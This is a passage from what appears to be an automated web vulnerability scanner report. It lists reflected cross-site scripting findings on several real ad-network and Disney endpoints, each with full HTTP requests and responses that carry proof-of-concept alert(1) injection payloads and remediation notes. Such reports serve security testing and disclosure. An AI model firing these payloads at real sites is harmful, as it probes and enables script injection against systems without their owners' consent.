GET /adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=363112&partnerID=9b5009"-alert(1)-"6877c3dfa7c&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8381
Date: Mon, 16 May 2011 01:32:01 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
optimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=363112&partnerID=9b5009"-alert(1)-"6877c3dfa7c&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=http%3a%2f%2fwww.twcbc.com/Texas/LeadGen/tsmoffer_acq.html%3Fmediaid%3Dneobc_d_0000001184");
var
...[SNIP]...

5.4. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [pub parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5396963.28

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c09c"-alert(1)-"29bf5f9ba6d was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=3631121c09c"-alert(1)-"29bf5f9ba6d&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8381
Date: Mon, 16 May 2011 01:31:10 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ttp%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=3631121c09c"-alert(1)-"29bf5f9ba6d&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=http%3a%2f%2fwww.twcbc.com/Texas/LeadGen/tsmoffer_acq.html%3Fmediaid%3Dneobc_d_000000
...[SNIP]...

5.5. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [pubICode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5396963.28

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edd95"-alert(1)-"46635aeff4 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912edd95"-alert(1)-"46635aeff4&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8377
Date: Mon, 16 May 2011 01:30:15 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
oQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912edd95"-alert(1)-"46635aeff4&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=http%3a%2f%2fwww.twcbc.com/Texas/LeadGen/tsmoffer_acq.html%3Fmediaid%3Dneo
...[SNIP]...

5.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5396963.28

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46709"-alert(1)-"ff673e56b43 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml46709"-alert(1)-"ff673e56b43&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8381
Date: Mon, 16 May 2011 01:32:52 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
rack_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml46709"-alert(1)-"ff673e56b43&redirectURL=http%3a%2f%2fwww.twcbc.com/Texas/LeadGen/tsmoffer_acq.html%3Fmediaid%3Dneobc_d_0000001184");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...

5.7. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53909"><script>alert(1)</script>6f86f34a5c9 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=53909"><script>alert(1)</script>6f86f34a5c9&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4325897289836481830; pf=UzQBb_qiX6nr0FKOSBMrL4loZQajlZS6rkFepl0bgHZzsYisygncD_G3QSholkobwYgDN2QBUCNB-f2MyAu5Iq-zuOwmX-HrTHP_QKh0DDi99zZmaeAXB5JqUWuVeu3CdB8okOrIsD5nHq-_Oy6eE6ZJ2sUtm5dhlmrTisFEH-Qb_3kXOMU75B8jogKvtULEAuR9LhkZd1Pd-Bo72tCNnWkHYZEnMGWwdeg40WMiAMgzcOT8yL0M8Y7JHcobYaY7CrcYIpvJPvJ4qVS8lVf1VA4PrJv2xfxYYZ31k7BT2Jc

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:51 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:19:50 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=8396388994325352248&fpid=53909"><script>alert(1)</script>6f86f34a5c9&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.8. http://ad.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8be12"><script>alert(1)</script>a7cb27fcac5 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1&sp=8be12"><script>alert(1)</script>a7cb27fcac5 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4325897289836481830; pf=UzQBb_qiX6nr0FKOSBMrL4loZQajlZS6rkFepl0bgHZzsYisygncD_G3QSholkobwYgDN2QBUCNB-f2MyAu5Iq-zuOwmX-HrTHP_QKh0DDi99zZmaeAXB5JqUWuVeu3CdB8okOrIsD5nHq-_Oy6eE6ZJ2sUtm5dhlmrTisFEH-Qb_3kXOMU75B8jogKvtULEAuR9LhkZd1Pd-Bo72tCNnWkHYZEnMGWwdeg40WMiAMgzcOT8yL0M8Y7JHcobYaY7CrcYIpvJPvJ4qVS8lVf1VA4PrJv2xfxYYZ31k7BT2Jc

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:52 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:19:52 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=2848499807473428303&fpid=1&nu=n&t=&sp=8be12"><script>alert(1)</script>a7cb27fcac5&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.9. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afbcc'-alert(1)-'de2db0c7e4f was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193afbcc'-alert(1)-'de2db0c7e4f&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]1]%)u#^pig7$W[c#Nv?q+O.JPTaAJ6dMys4SK'wFPAQFp.dMq!LfS)mzXh]:[^WX?#; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 01:24:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 01:24:15 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 01:24:15 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193afbcc'-alert(1)-'de2db0c7e4f&external_user_id=3420415245200633085&expiration=0" width="0" height="0"/>');

5.10. http://admeld.adnxs.com/usersync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c41fd'-alert(1)-'405c5446774 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchc41fd'-alert(1)-'405c5446774 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]1]%)u#^pig7$W[c#Nv?q+O.JPTaAJ6dMys4SK'wFPAQFp.dMq!LfS)mzXh]:[^WX?#; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 01:25:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 01:25:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 01:25:25 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/matchc41fd'-alert(1)-'405c5446774?admeld_adprovider_id=193&external_user_id=3420415245200633085&expiration=0" width="0" height="0"/>');

5.11. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db21a"-alert(1)-"6d8220e3728 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=728x90&section=1565884&db21a"-alert(1)-"6d8220e3728=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:23:40 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 01:23:40 GMT
Pragma: no-cache
Content-Length: 4323
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ads.bluelithium.com/imp?Z=728x90&db21a"-alert(1)-"6d8220e3728=1&s=1565884&_salt=128442006";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(r
...[SNIP]...

5.12. http://ahome.disney.go.com/globalelements/chrome.css [styleBackground parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ahome.disney.go.com
Path:   /globalelements/chrome.css

Issue detail

The value of the styleBackground request parameter is copied into the HTML document as plain text between tags. The payload e07d2<script>alert(1)</script>792a5655ec9 was submitted in the styleBackground parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /globalelements/chrome.css?secure=false&IE6=false&styleSet=mediumGray&styleText=null&styleTextHover=null&styleTextSelected=null&styleBackground=nulle07d2<script>alert(1)</script>792a5655ec9&styleHover=null&styleMiddleLine=null&styleSelected=null HTTP/1.1
Host: ahome.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; mbox=check#true#1305508873|session#1305508812278-378400#1305510673; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305510612305%3B; s_sess=%20s_cc%3Dtrue%3B%20s_wdpro_lid%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]

Response

